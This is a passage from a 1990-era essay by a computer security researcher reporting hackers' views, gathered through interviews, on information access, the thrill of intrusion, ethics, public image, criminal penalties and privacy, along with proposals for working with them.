  653. hackers: ``A hacker is someone who experiments with systems...
  654. (Hacking) is playing with systems and making them do what they were
  655. never intended to do.  Breaking in and making free calls is just
  656. a small part of that.  Hacking is also about freedom of speech and
  657. free access to information -- being able to find out anything.  There
  658. is also the David and Goliath side of it, the underdog vs. the system,
  659. and the ethic of being a folk hero, albeit a minor one.''
  660.  
  661. Richard Stallman, founder of the Free Software Foundation who calls
  662. himself a hacker according to the first sense of the word above,
  663. recommends calling security-breaking hackers ``crackers''
  664. (Stallman84).  While this description may be more accurate, I shall
  665. use the term ``hacker'' since the people I am writing about call
  666. themselves hackers and all are interested in learning about computer
  667. and communication systems.  However, there are many people like
  668. Stallman who call themselves hackers and do not engage in illegal
  669. or deceptive practices; this paper is also not about those hackers.
  670.  
  671. In what follows I will report on what I have learned about hackers
  672. from hackers.  I will organize the discussion around the principal
  673. domains of concerns I observed.  I recommend Meyer's thesis (Meyer89)
  674. for a more detailed treatment of the hackers' social culture and
  675. networks, and Meyer and Thomas (MeyerThomas90) for an interesting
  676. interpretation of the computer underground as a postmodernist rejection
  677. of conventional culture that substitutes ``rational technological
  678. control of the present for an anarchic and playful future.''
  679.  
  680. I do not pretend to know all the concerns that hackers have, nor
  681. do I claim to have conducted a scientific study.  Rather, I hope
  682. that my own informal study motivates others to explore the area
  683. further.  It is essential that we as computer security professionals
  684. take into account hackers' concerns in the design of our policies,
  685. procedures, laws regulating computer and information access, and
  686. educational programs.  Although I speak about security-breaking hackers
  687. as a group, their competencies, actions, and views are not all the
  688. same.  Thus, it is equally important that our policies and programs
  689. take into account individual differences.
  690.  
  691. In focusing on what hackers say and do, I do not mean for a moment
  692. to set aside the concerns of the owners and users of systems that
  693. hackers break into, the concerns of law enforcement personnel, or
  694. our own concerns as computer security professionals.  But I do
  695. recommend that we work closely with hackers as well as these other
  696. groups to design new approaches and programs for addressing the
  697. concerns of all.   Like ham radio operators, hackers exist, and it
  698. is in our best interest that we learn to communicate and work with
  699. them rather than against them.
  700.  
  701. I will suggest some actions that we might consider taking, and I
  702. invite others to reflect on these and suggest their own.  Many of
  703. these suggestions are from the hackers themselves; others came from
  704. the recommendations of the ACM Panel on Hacking (Lee86) and from
  705. colleagues.
  706.  
  707. I grouped the hackers' concerns into five categories: access to
  708. computers and information for learning; thrill, excitement and
  709. challenge; ethics and avoiding damage; public image and treatment;
  710. and privacy and first amendment rights.  These are discussed in
  711. the next five subsections.  I have made an effort to present my
  712. findings as uncritical observations.  The reader should not infer
  713. that I either approve or disapprove of actions hackers take.
  714.  
  715.  
  716. 3.  Access to Computers and Information for Learning
  717.  
  718. Although Levy's book ``Hackers'' (Levy84) is not about today's
  719. security-breaking hackers, it articulates and interprets a ``hacker
  720. ethic'' that is shared by many of these hackers.  The ethic includes
  721. two key principles that were formulated in the early days of the
  722. AI Lab at MIT: ``Access to computers -- and anything which might
  723. teach you something about the way the world works -- should be
  724. unlimited and total,'' and ``All information should be free.''  In
  725. the context in which these principles were formulated, the computers
  726. of interest were research machines and the information was software
  727. and systems information.
  728.  
  729. Since Stallman is a leading advocate of open systems and freedom
  730. of information, especially software, I asked him what he means by
  731. this.  He said: ``I believe that all generally useful information
  732. should be free. By `free' I am not referring to price, but rather
  733. to the freedom to copy the information and to adapt it to one's own
  734. uses.''  By ``generally useful'' he does not include confidential
  735. information about individuals or credit card information, for example.
  736. He further writes: ``When information is generally useful,
  737. redistributing it makes humanity wealthier no matter who is
  738. distributing and no matter who is receiving.''  Stallman has argued
  739. strongly against user interface copyright, claiming that it does
  740. not serve the users or promote the evolutionary process (Stallman90).
  741.  
  742. I asked hackers whether all systems should be accessible and all
  743. information should be free.  They said that it is OK if some systems
  744. are closed and some information, mainly confidential information
  745. about individuals, is not accessible.  They make a distinction between
  746. information about security technology, e.g., the DES, and confidential
  747. information protected by that technology, arguing that it is the
  748. former that should be accessible.   They said that information hoarding
  749. is inefficient and slows down evolution of technology.  They also
  750. said that more systems should be open so that idle resources are
  751. not wasted.  One hacker said that the high costs of communication
  752. hurts the growth of the information economy.
  753.  
  754. These views of information sharing seem to go back at least as far
  755. as the 17th and 18th centuries.  Samuelson (Samuelson89) notes that
  756. ``The drafters of the Constitution, educated in the Enlightenment
  757. tradition, shared that era's legacy of faith in the enabling powers
  758. of knowledge for society as well as the individual.''  She writes
  759. that our current copyright laws, which protect the expression of
  760. information, but not the information itself, are based on the belief
  761. that unfettered and widespread dissemination of information promotes
  762. technological progress. (Similarly for patent laws which protect
  763. devices and processes, not the information about them.)  She cites
  764. two recent court cases where courts reversed the historical trend
  765. and treated information as ownable property.  She raises questions
  766. about whether in entering the Information Age where information is
  767. the source of greatest wealth, we have outgrown the Enlightenment
  768. tradition and are coming to treat information as property.
  769.  
  770. In a society where knowledge is said to be power, Drake expressed
  771. particular concern about what he sees as a growing information gap
  772. between the rich and poor.  He would like to see information that
  773. is not about individuals be made public, although it could still
  774. be owned.  He likes to think that companies would actually find it
  775. to their advantage to share information.  He noted how IBM's disclosure
  776. of the PC allowed developers to make more products for the computers,
  777. and how Adobe's disclosure of their fonts helped them compete against
  778. the Apple-Microsoft deal.  He recognizes that in our current political
  779. framework, it is difficult to make all information public, because
  780. complicated structures have been built on top of an assumption that
  781. certain information will be kept secret.  He cites our defense policy,
  782. which is founded on secrecy for military information, as an example.
  783.  
  784. Hackers say they want access to information and computing and network
  785. resources in order to learn.  Both Levy (Levy84) and Landreth
  786. (Landreth89) note that hackers have an intense, compelling interest
  787. in computers and learning, and many go into computers as a profession.
  788. Some hackers break into systems in order to learn more about how
  789. the systems work.  Landreth says these hackers want to remain
  790. undiscovered so that they can stay on the system as long as possible.
  791. Some of them devote most of their time to learning how to break the
  792. locks and other security mechanisms on systems; their background
  793. in systems and programming varies considerably.  One hacker wrote
  794. ``A hacker sees a security hole and takes advantage of it because
  795. it is there, not to destroy information or steal.  I think our
  796. activities would be analogous to someone discovering methods of
  797. acquiring information in a library and becoming excited and perhaps
  798. engrossed.''
  799.  
  800. We should not underestimate the effectiveness of the networks in
  801. which hackers learn their craft.  They do research, learn about
  802. systems, work in groups, write, and teach others.  One hacker said
  803. that he belongs to a study group with the mission of churning out
  804. files of information and learning as much as possible.  Within the
  805. group, people specialize, collaborate on research projects, share
  806. information and news, write articles, and teach others about their
  807. areas of specialization.  Hackers have set up a private system of
  808. education that engages them, teaches them to think, and allows them
  809. to apply their knowledge in purposeful, if not always legal,
  810. activity.   Ironically, many of our nation's classrooms have been
  811. criticized for providing a poor learning environment that seems to
  812. emphasize memorization rather than thinking and reasoning.  One hacker
  813. reported that through volunteer work with a local high school, he
  814. was trying to get students turned on to learning.
  815.  
  816. Many hackers say that the legitimate computer access they have through
  817. their home and school computers do not meet their needs.  One student
  818. told me that his high school did not offer anything beyond elementary
  819. courses in BASIC and PASCAL, and that he was bored by these.  Hans
  820. Huebner, a hacker in Germany who goes by the name Pengo, wrote in
  821. a note to the RISKS Forum (Huebner89) : ``I was just interested in
  822. computers, not in the data which has been kept on their disks. As
  823. I was going to school at that time, I didn't even have the money
  824. to buy my own computer.  Since CP/M (which was the most sophisticated
  825. OS I could use on machines which I had legal access to) didn't turn
  826. me on anymore, I enjoyed the lax security of the systems I had access
  827. to by using X.25 networks.  You might point out that I should have
  828. been patient and waited until I could go to the university and
  829. use their machines.  Some of you might understand that waiting was
  830. just not the thing I was keen on in those days.''
  831.  
  832. Brian Harvey, in his position paper (Harvey86) for the ACM Panel on
  833. Hacking, claims that the computer medium available to students, e.g.,
  834. BASIC and floppy disks, is inadequate for challenging intellectual
  835. work.  His recommendation is that students be given access to real
  836. computing power, and that they be taught how to use that power
  837. responsibly.  He describes a program he created at a public high school
  838. in Massachusetts during the period 1979-1982.  They installed a
  839. PDP-11/70 and let students and teachers carry out the administration
  840. of the system.  Harvey assessed that putting the burden of dealing
  841. with the problems of malicious users on the students themselves was
  842. a powerful educational force.  He also noted that the students who
  843. had the skill and interest to be password hackers were discouraged
  844. from this activity because they also wanted to keep the trust of
  845. their colleagues in order that they could acquire ``superuser'' status
  846. on the system.
  847.  
  848. Harvey also makes an interesting analogy between teaching computing
  849. and teaching karate.  In karate instruction, students are introduced
  850. to the real, adult community.  They are given access to a powerful,
  851. deadly weapon, and at the same time are taught discipline and
  852. responsibility.  Harvey speculates that the reason that students
  853. do not misuse their power is that they know they are being trusted
  854. with something important, and they want to live up to that trust.
  855. Harvey applied this principle when he set up the school system.
  856.  
  857. The ACM panel endorsed Harvey's recommendation, proposing a
  858. three-tiered computing environment with local, district-wide, and
  859. nation-wide networks.  They recommended that computer professionals
  860. participate in this effort as mentors and role models.   They also
  861. recommended that government and industry be encouraged to establish
  862. regional computing centers using donated or re-cycled equipment;
  863. that students be apprenticed to local companies either part-time
  864. on a continuing basis or on a periodic basis; and, following a
  865. suggestion from Felsenstein (Felsenstein86) for a ``Hacker's League,''
  866. that a league analogous to the Amateur Radio Relay League be
  867. established to make contributed resources available for educational
  868. purposes.
  869.  
  870. Drake said he liked these recommendations.  He said that if hackers
  871. were given access to powerful systems through a public account system,
  872. they would supervise themselves.  He also suggested that Computer
  873. Resource Centers be established in low-income areas in order to help
  874. the poor get access to information.  Perhaps hackers could help run
  875. the centers and teach the members of the community how to use the
  876. facilities.  One of my colleagues suggested cynically that the hackers
  877. would only use this to teach the poor how to hack rich people's
  878. systems.  A hacker responded by saying this was ridiculous; hackers
  879. would not teach people how to break into systems, but rather how
  880. to use computers effectively and not be afraid of them.
  881. In addition, the hackers I spoke with who had given up illegal
  882. activities said they stopped doing so when they got engaged in other
  883. work.
  884.  
  885. Geoff Goodfellow and Richard Stallman have reported that they have
  886. given hackers accounts on systems that they manage, and that the
  887. hackers have not misused the trust granted to them.  Perhaps
  888. universities could consider providing accounts to pre-college students
  889. on the basis of recommendations from their teachers or parents.
  890. The students might be challenged to work on the same homework problems
  891. assigned in courses or to explore their own interests.  Students
  892. who strongly dislike the inflexibility of classroom learning might
  893. excel in an environment that allows them to learn on their own, in
  894. much the way that hackers have done.
  895.  
  896. 4.  Thrill, Excitement, and Challenge
  897.  
  898.  
  899. One hacker wrote that ``Hackers understand something basic about
  900. computers, and that is that they can be enjoyed.  I know none who
  901. hack for money, or hack to frighten the company, or hack for anything
  902. but fun.''
  903.  
  904. In the words of another hacker, ``Hacking was the ultimate cerebral
  905. buzz for me.  I would come home from another dull day at school,
  906. turn my computer on, and become a member of the hacker elite.  It
  907. was a whole different world where there were no condescending adults
  908. and you were judged only by your talent.  I would first check in
  909. to the private Bulletin Boards where other people who were like me
  910. would hang out, see what the news was in the community, and trade
  911. some info with people across the country.  Then I would start actually
  912. hacking.  My brain would be going a million miles an hour and I'd
  913. basically completely forget about my body as I would jump from one
  914. computer to another trying to find a path into my target.  It was
  915. the rush of working on a puzzle coupled with the high of discovery
  916. many magnitudes intensified.  To go along with the adrenaline rush
  917. was the illicit thrill of doing something illegal. Every step I made
  918. could be the one that would bring the authorities crashing down on
  919. me.  I was on the edge of technology and exploring past it, spelunking
  920. into electronic caves where I wasn't supposed to be.''
  921.  
  922. The other hackers I spoke with made similar statements about the
  923. fun and challenge of hacking.  In SPIN magazine (Dibbel90), reporter
  924. Julian Dibbell speculated that much of the thrill comes from the
  925. dangers associated with the activity, writing that ``the technology
  926. just lends itself to cloak-and-dagger drama,'' and that ``hackers
  927. were already living in a world in which covert action was nothing
  928. more than a game children played.''
  929.  
  930. Eric Corley (Corley89) characterizes hacking as an evolved form of
  931. mountain climbing.  In describing an effort to construct a list of
  932. active mailboxes on a Voice Messaging System, he writes ``I suppose
  933. the main reason I'm wasting my time pushing all these buttons is
  934. simply so that I can make a list of something that I'm not supposed
  935. to have and be the first person to accomplish this.''  He said that
  936. he was not interested in obtaining an account of his own on the system.
  937. Gordon Meyer says he found this to be a recurring theme: ``We aren't
  938. supposed to be able to do this, but we can'' -- so they do.
  939.  
  940. One hacker said he was now working on anti-viral programming.  He
  941. said it was almost as much fun as breaking into systems, and that
  942. it was an intellectual battle against the virus author.
  943.  
  944.  
  945. 5.  Ethics and Avoiding Damage
  946.  
  947.  
  948. All of the hackers I spoke with said that malicious hacking was morally
  949. wrong.  They said that most hackers are not intentionally malicious,
  950. and that they themselves are concerned about causing accidental
  951. damage.  When I asked Drake about the responsibility of a person
  952. with a PC and modem, his reply included not erasing or modifying
  953. anyone else's data, and not causing a legitimate user on a system
  954. any problems.  Hackers say they are outraged when other hackers cause
  955. damage or use resources that would be missed, even if the results
  956. are unintentional and due to incompetence.  One hacker wrote ``I
  957. have ALWAYS strived to do NO damage, and to inconvenience as few people
  958. as possible.  I NEVER, EVER, EVER DELETE A FILE.  One of the first
  959. commands I do on a new system is disable the delete file command.''
  960. Some hackers say that it is unethical to give passwords and similar
  961. security-related information to persons who might do damage.  In
  962. the recent incident where a hacker broke into Bell South and downloaded
  963. a text file on the emergency 911 service, hackers say that there
  964. was no intention to use this knowledge to break into or sabotage
  965. the 911 system.  According to Emmanuel Goldstein (Goldstein90), the
  966. file did not even contain information about how to break into the
  967. 911 system.
  968.  
  969. The hackers also said that some break-ins were unethical, e.g.,
  970. breaking into hospital systems, and that it is wrong to read
  971. confidential information about individuals or steal classified
  972. information.  All said it was wrong to commit fraud for personal
  973. profit.
  974.  
  975. Although we as computer security professionals often disagree with
  976. hackers about what constitutes damage, the ethical standards listed
  977. here sound much like our own.  Where the hackers' ethics differ from
  978. the standards adopted by most in the computer security community
  979. is that hackers say it is not unethical to break into many systems,
  980. use idle computer and communications resources, and download system
  981. files in order to learn.  Goldstein says that hacking is not wrong:
  982. it is not the same as stealing, and uncovers design flaws and security
  983. deficiencies (Goldstein89).
  984.  
  985. Brian Reid, a colleague at Digital who has spoken with many hackers,
  986. speculates that a hacker's ethics may come from not being raised
  987. properly as a civilized member of society, and not appreciating the
  988. rules of living in society.  One hacker responded to this with ``What
  989. does `being brought up properly' mean?  Some would say that it is
  990. `good' to keep to yourself, mind your own business.  Others might
  991. argue that it is healthy to explore, take risks, be curious and
  992. discover.'' Brian Harvey (Harvey86) notes that many hackers are
  993. adolescents, and that adolescents are at a less advanced stage of
  994. moral development than adults, where they might not see how the effects
  995. of their actions hurt others.  Larry Martin (Martin89) claims that
  996. parents, teachers, the press, and others in society are not aware
  997. of their responsibility to contribute to instilling ethical values
  998. associated with computer use.  This could be the consequence of the
  999. youth of the computing field; many people are still computer illiterate
  1000. and cultural norms may be lagging behind advances in technology and
  1001. the growing dependency on that technology by businesses and society.
  1002. Hollinger and Lanza-Kaduce (HollingerLanza-Kaduce88) speculate that
  1003. the cultural normative messages about the use and abuse of computer
  1004. technology have been driven by the adoption of criminal laws in the
  1005. last decade.  They also speculate that hacking may be encouraged
  1006. during the process of becoming computer literate.  Some of my
  1007. colleagues say that hackers are irresponsible.  One hacker responded
  1008. ``I think it's a strong indication of the amount of responsibility
  1009. shown that so FEW actually DAMAGING incidents are known.''
  1010.  
  1011. But we must not overlook that the differences in ethics also reflect
  1012. a difference in philosophy about information and information handling
  1013. resources; whereas hackers advocate sharing, we seem to be advocating
  1014. ownership as property.  The differences also represent an opportunity
  1015. to examine our own ethical behavior and our practices for information
  1016. sharing and protection.  For example, one hacker wrote ``I will accept
  1017. that it is morally wrong to copy some proprietary software, however,
  1018. I think that it is morally wrong to charge $6000 for a program that
  1019. is only around 25K long.''  Hence, I shall go into a few of the ethical
  1020. points raised by hackers more closely.  It is not a simple case of
  1021. good or mature (us) against bad or immature (hackers), or of teaching
  1022. hackers a list of rules.
  1023.  
  1024. Many computer professionals such as Martin (Martin89) argue the moral
  1025. questions by analogy.  The analogies are then used to justify their
  1026. judgment of a hacker's actions as unethical.  Breaking into a system
  1027. is compared with breaking into a house, and downloading information
  1028. and using computer and telecommunications services is compared with
  1029. stealing tangible goods.  But, say hackers, the situations are not
  1030. the same.  When someone breaks into a house, the objective is to
  1031. steal goods, which are often irreplaceable, and property is often
  1032. damaged in the process.  By contrast, when a hacker breaks into a
  1033. system, the objective is to learn and avoid causing damage.  Downloaded
  1034. information is copied, not stolen, and still exists on the original
  1035. system.  Moreover, as noted earlier, information has not been
  1036. traditionally regarded as property.  Dibbel (Dibbel90) says that
  1037. when the software industries and phone companies claim losses of
  1038. billions of dollars to piracy, they are not talking about goods that
  1039. disappear from the shelves and could have been sold.
  1040.  
  1041. We often say that breaking into a system implies a lack of caring
  1042. for the system's owner and authorized users.  But, one hacker says
  1043. that the ease of breaking into a system reveals a lack of caring
  1044. on the part of the system manager to protect user and company assets,
  1045. or failure on the part of vendors to warn managers about the
  1046. vulnerabilities of their systems.  He estimated his success rate
  1047. of getting in at 10-15%, and that is without spending more than an
  1048. hour on any one target system.  Another hacker says that he sees
  1049. messages from vendors notifying the managers, but that the managers
  1050. fail to take action.
  1051.  
  1052. Richard Pethia of CERT (Computer Emergency Response Team) reports
  1053. that they seldom see cases of malicious damage caused by hackers,
  1054. but that the break-ins are nevertheless disruptive because system
  1055. users and administrators want to be sure that nothing was damaged.
  1056. (CERT suggests that sites reload system software from secure backups
  1057. and change all user passwords in order to protect against possible
  1058. back doors and Trojan Horses that might have been planted by the
  1059. hacker.  Pethia also noted that prosecutors are generally called
  1060. for government sites, and are being called for non-government sites
  1061. with increasing frequency.)  Pethia says that break-ins also generate
  1062. a loss of trust in the computing environment, and may lead to adoption
  1063. of new policies that are formulated in a panic or management edicts
  1064. that severely restrict connectivity to outside systems.   Brian Harvey
  1065. says that hackers cause damage by increasing the amount of paranoia,
  1066. which in turn leads to tighter security controls that diminish the
  1067. quality of life for the users.  Hackers respond to these points by
  1068. saying they are the scapegoats for systems that are not adequately
  1069. protected.  They say that the paranoia is generated by ill-founded
  1070. fears and media distortions (I will return to this point later),
  1071. and that security need not be oppressive to keep hackers out; it
  1072. is mainly making sure that passwords and system defaults are
  1073. well chosen.
  1074.  
  1075. Pethia says that some intruders seem to be disruptive to prove a
  1076. point, such as that the systems are vulnerable, the security personnel
  1077. are incompetent, or ``it's not nice to say bad things about hackers.''
  1078. In the N.Y. Times, John Markoff (Markoff90) wrote that the hacker
  1079. who claimed to have broken into Cliff Stoll's system said he was
  1080. upset by Stoll's portrayal of hackers in ``The Cuckoo's Egg''
  1081. (Stoll90).   Markoff reported that the caller said: ``He (Stoll)
  1082. was going on about how he hates all hackers, and he gave pretty much
  1083. of a one-sided view of who hackers are.''
  1084.  
  1085. ``The Cuckoo's Egg'' captures many of the popular stereotypes of
  1086. hackers.  Criminologist Jim Thomas criticizes it for presenting a
  1087. simplified view of the world, one where everything springs from the
  1088. forces of light (us) or of darkness (hackers) (Thomas90).  He claims
  1089. that Stoll fails to see the similarities between his own activities
  1090. (e.g., monitoring communications, ``borrowing'' monitors without
  1091. authorization, shutting off network access without warning, and lying
  1092. to get information he wants) and those of hackers.  He points out
  1093. Stoll's use of pejorative words such as ``varmint'' to describe
  1094. hackers, and Stoll's quote of a colleague: ``They're technically
  1095. skilled but ethically bankrupt programmers without any respect for
  1096. others' work -- or privacy.  They're not destroying one or two
  1097. programs.  They're trying to wreck the cooperation that builds our
  1098. networks,'' (Stoll90, p. 159).  Thomas writes ``at an intellectual
  1099. level, it (Stoll's book) provides a persuasive, but simplistic, moral
  1100. imagery of the nature of right and wrong, and provides what -- to
  1101. a lay reader -- would seem a compelling justification for more statutes
  1102. and severe penalties against the computer underground.  This is
  1103. troublesome for two reasons.  First, it leads to a mentality of social
  1104. control by law enforcement during a social phase when some would
  1105. argue we are already over-controlled.  Second, it invokes a punishment
  1106. model that assumes we can stamp out behaviors to which we object
  1107. if only we apprehend and convict a sufficient number of violators.
  1108. ...  There is little evidence that punishment will in the long run
  1109. reduce any given offense, and the research of Gordon Meyer and I
  1110. suggests that criminalization may, in fact, contribute to the growth
  1111. of the computer underground.''
  1112.  
  1113.  
  1114. 6. Public Image and Treatment
  1115.  
  1116.  
  1117. Hackers express concern about their negative public image and
  1118. identity.  As noted earlier, hackers are often portrayed as being
  1119. irresponsible and immoral.  One hacker said that ``government
  1120. propaganda is spreading an image of our being at best, sub-human,
  1121. depraved, criminally inclined, morally corrupt, low life.  We need
  1122. to prove that the activities that we are accused of (crashing systems,
  1123. interfering with life support equipment, robbing banks, and jamming
  1124. 911 lines) are as morally abhorrent to us as they are to the general
  1125. public.''
  1126.  
  1127. The public identity of an individual or group is generated in part
  1128. by the actions of the group interacting with the standards of the
  1129. community observing those actions.  What then accounts for the
  1130. difference between the hacker's public image and what they say about
  1131. themselves?  One explanation may be the different standards.  Outside
  1132. the hacking community, the simple act of breaking into systems is
  1133. regarded as unethical by many.  The use of pejorative words like
  1134. ``vandal'' and ``varmint'' reflect this discrepency in ethics.  Even
  1135. the word ``criminal'' carries with it connotations of someone evil;
  1136. hackers say they are not criminal in this sense.  Katie Hafner notes
  1137. that Robert Morris Jr., who was convicted of launching the Internet
  1138. worm, was likened to a terrorist even though the worm did not destroy
  1139. data (Hafner90)
  1140.  
  1141. Distortions of events and references to potential threats also create
  1142. an image of persons who are dangerous.  Regarding the 911 incident
  1143. where a hacker downloaded a file from Bell South, Goldstein reported
  1144. ``Quickly, headlines screamed that hackers had broken into the 911
  1145. system and were interfering with emergency telephone calls to the
  1146. police.  One newspaper report said there were no indications that
  1147. anyone had died or been injured as a result of the intrusions.  What
  1148. a relief.  Too bad it wasn't true,'' (Goldstein90).  In fact, the
  1149. hackers involved with the 911 text file had not broken into the 911
  1150. system.  The dollar losses attributed to hacking incidents also are
  1151. often highly inflated.
  1152.  
  1153. Thomas and Meyer (ThomasMeyer90) say that the rhetoric depicting
  1154. hackers as a dangerous evil contributes to a ``witch hunt'' mentality,
  1155. wherein a group is first labeled as dangerous, and then enforcement
  1156. agents are mobilized to exorcise the alleged social evil.  They see
  1157. the current sweeps against hackers as part of a reaction to a broader
  1158. fear of change, rather than to the actual crimes committed.
  1159.  
  1160. Hackers say they are particularly concerned that computer security
  1161. professionals and system managers do not appear to understand hackers
  1162. or be interested in their concerns.  Hackers say that system managers
  1163. treat them like enemies and criminals, rather than as potential helpers
  1164. in their task of making their systems secure.  This may reflect
  1165. managers' fears about hackers, as well as their responsibilities
  1166. to protect the information on their systems.  Stallman says that
  1167. the strangers he encounters using his account are more likely to
  1168. have a chip on their shoulder than in the past; he attributes this
  1169. to a harsh enforcer mentality adopted by the establishment.  He says
  1170. that network system managers start out with too little trust and
  1171. a hostile attitude toward strangers that few of the strangers deserve.
  1172. One hacker said that system managers show a lack of openness to those
  1173. who want to learn.
  1174.  
  1175. Stallman also says that the laws make the hacker scared to communicate
  1176. with anyone even slightly ``official,'' because that person might
  1177. try to track the hacker down and have him or her arrested.  Drake
  1178. raised the issue of whether the laws could differentiate between
  1179. malicious and nonmalicious hacking, in support of a ``kinder, gentler''
  1180. relationship between hackers and computer security people.  In fact,
  1181. many states such as California initially passed computer crime laws
  1182. that excluded malicious hacking; it was only later that these laws
  1183. were amended to include nonmalicious actions (HollingerLanza-Kaduce88).
  1184. Hollinger and Lanza-Kaduce speculate that these amendments and other
  1185. new laws were catalyzed mainly by media events, especially the reports
  1186. on the ``414 hackers'' and the movie ``War Games,'' which created
  1187. a perception of hacking as extremely dangerous, even if that perception
  1188. was not based on facts.
  1189.  
  1190. Hackers say they want to help system managers make their systems
  1191. more secure.  They would like managers to recognize and use their
  1192. knowledge about system vulnerabilities.   Landreth (Landreth89)
  1193. suggests ways in which system managers can approach hackers in order
  1194. to turn them into colleagues, and Goodfellow also suggests befriending
  1195. hackers (Goodfellow83).  John Draper (Cap'n Crunch) says it would
  1196. help if system managers and the operators of phone companies and
  1197. switches could cooperate in tracing a hacker without bringing in
  1198. law enforcement authorities.
  1199.  
  1200. Drake suggests giving hackers free access in exchange for helping
  1201. with security, a suggestion that I also heard from several hackers.
  1202. Drake says that the current attitude of treating hackers as enemies
  1203. is not very conducive to a solution, and by belittling them, we only
  1204. cause ourselves problems.
  1205.  
  1206. I asked some of the hackers whether they'd be interested in breaking
  1207. into systems if the rules of the ``game'' were changed so that instead
  1208. of being threatened by prosecution, they were invited to leave a
  1209. ``calling card'' giving their name, phone number, and method of
  1210. breaking in.  In exchange, they would get recognition and points
  1211. for each vulnerability they discovered.  Most were interested in
  1212. playing; one hacker said he would prefer monetary reward since he
  1213. was supporting himself.  Any system manager interested in trying
  1214. this out could post a welcome message inviting hackers to leave their
  1215. cards.  This approach could have the advantage of not only letting
  1216. the hackers contribute to the security of the system, but of allowing
  1217. the managers to quickly recognize the potentially malicious hackers,
  1218. since they are unlikely to leave their cards.  Perhaps if hackers
  1219. are given the opportunity to make contributions outside the
  1220. underground, this will dampen their desire to pursue illegal activities.
  1221.  
  1222. Several hackers said that they would like to be able to pursue their
  1223. activities legally and for income.  They like breaking into systems,
  1224. doing research on computer security, and figuring out how to protect
  1225. against vulnerabilities.  They say they would like to be in a position
  1226. where they have permission to hack systems.  Goodfellow suggests
  1227. hiring hackers to work on tiger teams that are commissioned to locate
  1228. vulnerabilities in systems through penetration testing.  Baird
  1229. Info-Systems Safeguards, Inc., a security consulting firm, reports
  1230. that they have employed hackers on several assignments (Baird87).
  1231. They say the hackers did not violate their trust or the trust of
  1232. their clients, and performed in an outstanding manner.  Baird believes
  1233. that system vulnerabilities can be better identified by employing
  1234. people who have exploited systems.
  1235.  
  1236. One hacker suggested setting up a clearinghouse that would match
  1237. hackers with companies that could use their expertise, while
  1238. maintaining anonymity of the hackers and ensuring confidentiality
  1239. of all records.  Another hacker, in describing an incident where
  1240. he discovered a privileged account without a password, said ``What
  1241. I (and others) wish for is a way that hackers can give information
  1242. like this to a responsible source, AND HAVE HACKERS GIVEN CREDIT
  1243. FOR HELPING! As it is, if someone told them that `I'm a hacker, and
  1244. I REALLY think you should know...' they would freak out, and run
  1245. screaming to the SS (Secret Service) or the FBI. Eventually, the
  1246. person who found it would be caught, and hauled away on some crazy
  1247. charge.  If they could only just ACCEPT that the hacker was trying
  1248. to help!''  The clearinghouse could also provide this type of service.
  1249.  
  1250. Hackers are also interested in security policy issues.  Drake expressed
  1251. concern over how we handle information about computer security
  1252. vulnerabilities.  He argues that it is better to make this information
  1253. public than cover it up and pretend that it does not exist, and cites
  1254. the CERT to illustrate how this approach can be workable.  Other
  1255. hackers, however, argue for restricting initial dissemination of
  1256. flaws to customers and users.  Drake also expressed concern about
  1257. the role of the government, particularly the military, in
  1258. cryptography.  He argues that NSA's opinion on a cryptographic standard
  1259. should be taken with a large grain of salt because of their code
  1260. breaking role.
  1261.  
  1262. Some security specialists are opposed to hiring hackers for security
  1263. work, and Eugene Spafford has urged people not to do business with
  1264. any company that hires a convicted hacker to work in the security
  1265. area (ACM90).  He says that ``This is like having a known arsonist
  1266. install a fire alarm.''   But, the laws are such that a person can
  1267. be convicted for having done nothing other than break into a system;
  1268. no serious damage (i.e., no ``computer arson'') is necessary.  Many
  1269. of our colleagues, including Geoff Goodfellow (Goodfellow83) and
  1270. Brian Reid (Frenkel87), admit to having broken into systems in the
  1271. past.  Reid is quoted as saying that because of the knowledge he gained
  1272. breaking into systems as a kid, he was frequently called in to help
  1273. catch people who break in.  Spafford says that times have changed,
  1274. and that this method of entering the field is no longer socially
  1275. acceptable, and fails to provide adequate training in computer science
  1276. and computer engineering (Spafford89).  However, from what I have
  1277. observed, many hackers do have considerable knowledge about
  1278. telecommunications, data security, operating systems, programming
  1279. languages, networks, and cryptography.  But, I am not challenging
  1280. a policy to hire competent people of sound character.  Rather, I
  1281. am challenging a strict policy that uses economic pressure to close
  1282. a field of activity to all persons convicted of breaking into
  1283. systems.   It is enough that a company is responsible for the behavior
  1284. of its employees.  Each hacker can be considered for employment based
  1285. on his or her own competency and character.
  1286.  
  1287. Some people have called for stricter penalties for hackers, including
  1288. prison terms, in order to send a strong deterrent message to hackers.
  1289. John Draper, who was incarcerated for his activities in the 1970's,
  1290. argues that in practice this will only make the problem worse.  He
  1291. told me that he was forced under threat to teach other inmates his
  1292. knowledge of communications systems.  He believes that prison sentences
  1293. will serve only to spread hacker's knowledge to career criminals.
  1294. He said he was never approached by criminals outside the prison,
  1295. but that inside the prison they had control over him.
  1296.  
  1297. One hacker said that by clamping down on the hobbyist underground,
  1298. we will only be left with the criminal underground.  He said that
  1299. without hackers to uncover system vulnerabilities, the holes will
  1300. be left undiscovered, to be utilized by those likely to cause real
  1301. damage.
  1302.  
  1303. Goldstein argues that the existing penalties are already way out
  1304. of proportion to the acts committed, and that the reason is because
  1305. of computers (Goldstein89).  He says that if Kevin Mitnick had
  1306. committed crimes similar to those he committed but without a computer,
  1307. he would have been classified as a mischief maker and maybe fined
  1308. $100 for trespassing; instead, he was put in jail without bail
  1309. (Goldstein89).  Craig Neidorf, a publisher and editor of the electronic
  1310. newsletter ``Phrack,'' faces up to 31 years and a fine of $122,000
  1311. for receiving, editing, and transmitting the downloaded text file
  1312. on the 911 system (Goldstein90). (Since the time I wrote this, a new
  1313. indictment was issued with penalties of up to 65 years in prison.
  1314. Neidorf went on trial beginning July 23.  The trial ended July 27
  1315. when the government dropped all charges.  DED)
  1316.  
  1317. 7.  Privacy and the First and Fourth Amendments
  1318.  
  1319. The hackers I spoke with advocated privacy protection for sensitive
  1320. information about individuals.   They said they are not interested
  1321. in invading people's privacy, and that they limited their hacking
  1322. activities to acquiring information about computer systems or how
  1323. to break into them.  There are, of course, hackers who break into
  1324. systems such as the TRW credit database.  Emanuel Goldstein argues
  1325. that such invasions of privacy took place before the hacker arrived
  1326. (Harpers90).  Referring to credit reports, government files, motor
  1327. vehicle records, and the ``megabytes of data piling up about each
  1328. of us,'' he says that thousands of people legally can see and use
  1329. this data, much of it erroneous.  He claims that the public has been
  1330. misinformed about the databases, and that hackers have become
  1331. scapegoats for the holes in the systems.  One hacker questioned the
  1332. practice of storing sensitive personal information on open systems
